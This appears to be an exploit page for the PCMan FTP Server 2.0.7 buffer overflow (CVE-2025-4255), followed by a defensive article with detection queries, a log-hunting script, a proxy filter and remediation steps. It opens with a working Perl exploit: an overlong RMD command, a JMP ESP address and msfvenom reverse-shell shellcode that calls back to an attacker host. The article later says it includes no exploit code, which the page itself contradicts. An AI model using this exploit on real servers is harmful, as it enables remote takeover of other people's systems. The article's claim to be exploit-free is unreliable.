PCMan FTP Server 2.0.7 - Buffer Overflow

```perl
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)

use IO::Socket::INET;

my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" .
"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" .
"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" .
"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" .
"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" .
"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" .
"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" .
"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" .
"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" .
"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" .
"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" .
"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" .
"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" .
"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" .
"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" .
"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" .
"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" .
"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" .
"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" .
"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" .
"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" .
"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" .
"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" .
"\x17";

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.176.131",
    PeerPort => "21",
    Proto    => 'tcp',
) or die "Cannot connect to 192.168.176.131:21: $!\n";

my $offset  = "A" x 2007;
my $eip     = "\xd9\x2f\xe3\x74";
my $nops    = "\x90" x 20;
my $payload = $offset . $eip . $nops . $buf;

my $r = <$sock>;
print $sock "USER anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "PASS anonymous\r\n";
$r = <$sock>;
print $r;
sleep(1);
print $sock "RMD $payload\r\n";
$r = <$sock>;
print $r;
sleep(1);
close($sock);
```

PCMan FTP Server 2.0.7 — CVE-2025-4255: Overview and Defensive Guidance
This article explains the PCMan FTP Server 2.0.7 stack-based buffer overflow tracked as CVE-2025-4255, focusing on technical background, risk assessment, detection, and mitigation for defenders. It intentionally avoids step-by-step exploitation instructions and working exploit code, and instead provides practical, defensive, and incident-response oriented guidance for system owners, defenders, and incident responders.
Summary
CVE-2025-4255 is a stack-based buffer overflow vulnerability in PCMan FTP Server 2.0.7 that can be triggered by an overlong FTP command argument (notably in commands that accept path strings). When successful, the vulnerability may allow arbitrary code execution under the privileges of the FTP service. Because many legacy FTP deployments run with elevated rights on older Windows hosts, exposure is high in unpatched environments.
Affected software and impact
- Affected product: PCMan FTP Server 2.0.7
- Typical impact: Remote code execution, service compromise, persistence, and lateral movement if exploited
- Primary risk vectors: Internet-exposed or reachable FTP servers, default or weak network segmentation, legacy Windows systems without modern mitigations
- Notable environment: Commonly observed on legacy Windows XP / Windows Server 2003 era hosts; such hosts are high-risk because modern DEP/ASLR mitigations may be absent or ineffective
Technical analysis (high-level)
At a high level, the vulnerability is a classic stack-based buffer overflow in the FTP command handling routine that accepts path-like arguments. An attacker can send an overly long argument to a targeted FTP command, causing the process to overwrite stack frames and control flow data. With sufficient control, an attacker may redirect execution to attacker-supplied content (payload) and achieve arbitrary code execution.
Key defensive takeaways from the technical root cause:
- The issue stems from inadequate bounds checking when copying client-supplied data into a fixed-size stack buffer.
- Legacy systems (older compilers and OS builds) often lacked or had weaker exploit mitigations (e.g., no ASLR, weaker DEP/SEH protections), increasing exploitation reliability.
- Network-level exposure of FTP (TCP/21) multiplies risk — publicly reachable FTP servers should be treated as high-value targets.
Exploitability and attacker considerations (non-actionable)
Exploitability depends on several environmental factors such as target OS version, compile-time protections, service account privileges, and presence of network controls. Attackers who successfully exploit this type of vulnerability often attempt to spawn remote shells, upload backdoors, or move laterally. Because this article is written for defenders, we do not provide exploit code, offsets, or shellcode recipes.
Indicators of Compromise (IoCs) and behavioral signs
Look for behavioral and environmental indicators rather than raw exploit bytes. Useful IoCs include:
- Unusually long FTP command arguments in server logs — for example, commands that accept path arguments (RMD, CWD, MKD, RNFR, RNTO, etc.) with extremely long payloads.
- Unexpected child processes spawned by the FTP server (especially command shells, netcat-like binaries, or unknown executables).
- New or modified service autorun entries, scheduled tasks, or persistence markers created shortly after anomalous FTP activity.
- Outbound connections to suspicious remote hosts from the FTP server host (reverse shells or beaconing behavior).
- Elevated CPU or memory usage of the FTP service following unusual requests, or repeated crashes and restarts of the FTP daemon.
Detection and hunting: practical examples for defenders
Below are safe, defensive examples you can use to detect vulnerable servers and hunt for suspicious activity. These are intended for defenders only and avoid exploit details.
1) Banner/version discovery (safe)
```python
import socket

# Defensive script: retrieve FTP banner to check server version
# Use only on assets you own or are authorized to test
host = "10.0.0.5"
port = 21

try:
    s = socket.create_connection((host, port), timeout=5)
    banner = s.recv(1024)
    print("Banner:", banner.decode(errors='ignore'))
    s.close()
except Exception as e:
    print("Error:", e)
```
Explanation: This short script connects to a target FTP server and reads the initial banner line that many FTP servers present on connect. Defenders can use this to identify exposed PCMan FTP Server instances. Perform such checks only on assets you are authorized to scan.
2) Log-based detection patterns
Instead of searching for exploit byte patterns, search your FTP logs for abnormal lengths or repeated malformed requests. Example pseudo-queries for common SIEMs:
- Splunk (pseudo): index=ftp sourcetype=ftp_logs | where len(request) > 1500 and request_command IN ("RMD","MKD","CWD")
- ELK/Kibana (pseudo): request_command:(RMD OR MKD OR CWD) AND message_length:>1500
Explanation: These queries look for commands with unusually long arguments — a common sign that someone attempted to overrun a buffer. Tune length thresholds to your environment; baseline normal request sizes first to reduce false positives.
3) Network monitoring and IDS strategy
Configure network IDS/IPS and WAF rules to alert or block when FTP commands include arguments that exceed expected lengths, or when the FTP server receives a burst of anomalous requests from a single external IP. Example defensive approaches:
- Block or rate-limit FTP traffic from untrusted networks at the perimeter firewall.
- Create IDS rules that trigger on FTP commands with argument lengths significantly greater than the norm (this is behavior-based and not signature-based).
- Monitor for repeated connection attempts and unusual command sequences from single remote IPs.
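The two detection ideas above (over-length arguments to path commands, and bursts of such requests from a single source) can be implemented offline against exported FTP logs. The following script is an added example, not part of the original article or of PCMan; the log line format, the sample log lines, the 1500-character threshold and the 60-second burst window are all constructed assumptions and must be adapted to the server's real log format and to a baseline of normal request sizes.

```python
"""Hunt FTP logs for over-length path-command arguments and per-source bursts.

Added example for the log-based detection and IDS-strategy sections.
The log format "<ISO timestamp> <client ip> <COMMAND> <argument>" and the
sample lines below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Commands that take a path argument and are the usual overflow targets
PATH_COMMANDS = {"RMD", "MKD", "CWD", "RNFR", "RNTO", "DELE", "RETR", "STOR"}
# Assumed threshold; follows the article's pseudo-queries, baseline before use
MAX_ARG_LEN = 1500

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$"
)


def parse_line(line):
    """Parse one constructed-format log line into a dict, or None if unparseable."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "ip": m["ip"],
        "cmd": m["cmd"].upper(),
        "arg": m["arg"] or "",
    }


def find_overlong(lines, max_len=MAX_ARG_LEN):
    """Return parsed events whose path-command argument exceeds max_len."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev and ev["cmd"] in PATH_COMMANDS and len(ev["arg"]) > max_len:
            hits.append(ev)
    return hits


def find_bursts(lines, window=timedelta(seconds=60), threshold=3,
                max_len=MAX_ARG_LEN):
    """Return {ip: peak_count} for sources with >= threshold overlong events
    inside any sliding window of the given length."""
    by_ip = defaultdict(list)
    for ev in find_overlong(lines, max_len):
        by_ip[ev["ip"]].append(ev["ts"])
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # Slide the window start forward until it fits within `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


# Constructed sample log: one isolated over-length RMD from 203.0.113.7 and a
# burst of three over-length path commands from 198.51.100.9 within 30 seconds.
SAMPLE_LOG = [
    "2025-04-17T10:00:01 203.0.113.7 USER anonymous",
    "2025-04-17T10:00:02 203.0.113.7 PASS anonymous",
    "2025-04-17T10:00:03 203.0.113.7 CWD /pub",
    "2025-04-17T10:00:04 203.0.113.7 RMD " + "A" * 2100,
    "2025-04-17T10:05:00 198.51.100.9 USER anonymous",
    "2025-04-17T10:05:01 198.51.100.9 RMD " + "A" * 2100,
    "2025-04-17T10:05:10 198.51.100.9 MKD " + "B" * 1800,
    "2025-04-17T10:05:30 198.51.100.9 CWD " + "C" * 1600,
    "2025-04-17T10:05:31 198.51.100.9 QUIT",
]

if __name__ == "__main__":
    for ev in find_overlong(SAMPLE_LOG):
        print(f"{ev['ts']} {ev['ip']} {ev['cmd']} arg_len={len(ev['arg'])}")
    print("burst sources:", find_bursts(SAMPLE_LOG))
```

The burst detector deliberately keys on sources that already produced over-length arguments rather than on raw connection counts, so a busy but well-behaved client is not flagged; if the server logs argument lengths rather than the arguments themselves, `parse_line` is the only function that needs changing.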
Mitigation and remediation
Primary remediation is to remove the vulnerable software or apply the vendor patch. If immediate patching is not possible, apply layered mitigations to reduce risk.
- Patch/update: Apply vendor-supplied updates or upgrade to a maintained FTP solution. If a vendor patch is available, apply it on all affected hosts as soon as possible.
- Remove or replace: Consider replacing legacy FTP with secure alternatives (SFTP/FTPS) or modern managed file-transfer solutions that receive security updates.
- Isolate and firewall: Block inbound TCP/21 at the perimeter unless business needs require it. Restrict FTP access via ACLs and VPNs to known trusted hosts.
- Least privilege: Ensure the FTP service runs with least privilege and not as SYSTEM/Administrator where feasible.
- Application-layer protections: Use WAF or application proxies to enforce maximum argument lengths for path commands and to normalize inputs.
- Harden endpoints: Enable OS mitigations where available (DEP, ASLR, modern patch levels). Upgrade operating systems where possible.
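The application-layer item above asks a proxy to enforce maximum argument lengths for path commands before a request ever reaches the legacy server. The following check is an added example of that decision logic, not PCMan code and not a complete proxy; the per-command limits, the 512-byte line cap and the reply strings are assumptions to be tuned to the files and clients an environment actually serves.

```python
"""Per-command argument length enforcement for an FTP-aware proxy.

Added example for the application-layer mitigation; not PCMan code.
Models the accept/reject decision made for each client command line before it
is forwarded to the protected server. All limits below are assumed values.
"""
from dataclasses import dataclass, field


@dataclass
class FtpArgPolicy:
    # Hard cap on the whole command line, CRLF included (assumed value)
    max_line_len: int = 512
    # Per-command argument caps; 260 mirrors a classic Windows MAX_PATH (assumed)
    per_command: dict = field(default_factory=lambda: {
        "CWD": 260, "RMD": 260, "MKD": 260, "RNFR": 260, "RNTO": 260,
        "DELE": 260, "RETR": 260, "STOR": 260, "LIST": 260, "NLST": 260,
        "USER": 64, "PASS": 128,
    })
    # Cap for commands not listed above
    default_max_arg: int = 128


def check_ftp_command(raw: bytes, policy: FtpArgPolicy = None):
    """Return (allowed, reply).

    allowed is True when the line may be forwarded; otherwise reply holds the
    5xx response the proxy should return to the client instead of forwarding.
    """
    if policy is None:
        policy = FtpArgPolicy()

    # Length check first: it is the cheapest and covers the overflow case
    if len(raw) > policy.max_line_len:
        return False, b"500 Command line too long.\r\n"

    line = raw.rstrip(b"\r\n")
    # Control bytes (NUL, stray CR/LF, Telnet IAC sequences) have no place in
    # a legitimate command line once the terminator is stripped
    if any(b < 0x20 or b == 0xFF for b in line):
        return False, b"500 Illegal character in command.\r\n"

    cmd_bytes, _, arg = line.partition(b" ")
    cmd = cmd_bytes.upper().decode("ascii", "replace")
    if not cmd.isalpha() or not 3 <= len(cmd) <= 4:
        return False, b"500 Syntax error, command unrecognized.\r\n"

    limit = policy.per_command.get(cmd, policy.default_max_arg)
    if len(arg) > limit:
        return False, b"501 Syntax error: argument too long.\r\n"
    return True, None


def filter_session(lines, policy: FtpArgPolicy = None):
    """Apply the policy to a sequence of raw command lines and return the list
    of (line, allowed, reply) decisions, e.g. for logging at the proxy."""
    return [(line, *check_ftp_command(line, policy)) for line in lines]


if __name__ == "__main__":
    # Constructed session: a normal login followed by an over-length RMD
    session = [
        b"USER anonymous\r\n",
        b"PASS anonymous\r\n",
        b"CWD /pub\r\n",
        b"RMD " + b"A" * 2007 + b"\r\n",
    ]
    for line, allowed, reply in filter_session(session):
        print(len(line), "ALLOW" if allowed else reply.decode().strip())
```

Rejecting on total line length before parsing means the proxy never has to buffer or inspect a multi-kilobyte argument, and returning a standard 5xx reply keeps well-behaved clients working while denying the legacy server any chance to copy the oversized argument.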
Incident response and recovery
If you suspect exploitation, follow an established IR playbook and preserve evidence:
- Isolate the host from the network to prevent further lateral movement; preserve volatile evidence (memory dumps, running process lists, network connections) before restarting or shutting down.
- Collect FTP server logs, system event logs, scheduled tasks, autoruns, and registry changes. Capture network pcap covering the relevant timeframe.
- Perform a full forensic analysis (memory + disk) to identify indicators of execution (shell processes, injected DLLs, unknown files, persistence mechanisms).
- Reset credentials and review accounts for unauthorized additions.
- Rebuild compromised hosts from known-good images when possible; do not trust a compromised system to be sanitized in place unless you have a validated remediation process.
Prioritization and risk management
Prioritize remediation based on exposure and business impact: Internet-facing FTP servers, servers in highly privileged network segments, and hosts with legacy OSes should be remediated first. Maintain an asset inventory and map business-critical data flows that rely on FTP.
References and resources
| Item | Resource |
|---|---|
| CVE entry | CVE (search CVE-2025-4255) |
| Vendor / Project | PCMan/OpenFoundry project page |
| Defensive reading | Guides on secure FTP deployment, network segmentation, and incident response playbooks |
Final notes and responsible disclosure
If you are a software vendor or system owner who believes you have discovered a new vulnerability, follow responsible disclosure best practices: privately notify the vendor with reproducible, non-exploitable test cases, allow reasonable time for patch development, and coordinate public disclosure. If you are a defender, prioritize patching and isolation over experimentation with exploitation techniques.